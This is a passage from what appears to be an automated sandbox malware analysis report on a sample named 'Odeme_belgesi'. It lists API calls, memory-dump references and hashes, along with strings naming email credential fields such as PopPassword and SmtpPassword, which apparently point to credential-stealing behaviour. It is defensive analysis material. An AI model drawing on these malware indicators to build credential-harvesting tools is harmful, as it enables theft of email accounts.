                • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                APIs
                • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                APIs
                • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                APIs
                • CoInitialize.OLE32(00000000), ref: 0040438F
                • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                • VariantInit.OLEAUT32(?), ref: 004043C4
                • SysAllocString.OLEAUT32(?), ref: 004043CD
                • VariantInit.OLEAUT32(?), ref: 00404414
                • SysAllocString.OLEAUT32(?), ref: 00404419
                • VariantInit.OLEAUT32(?), ref: 00404431
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: InitVariant$AllocString$CreateInitializeInstance
                • String ID:
                • API String ID: 1312198159-0
                • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                • API String ID: 0-2111798378
                • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64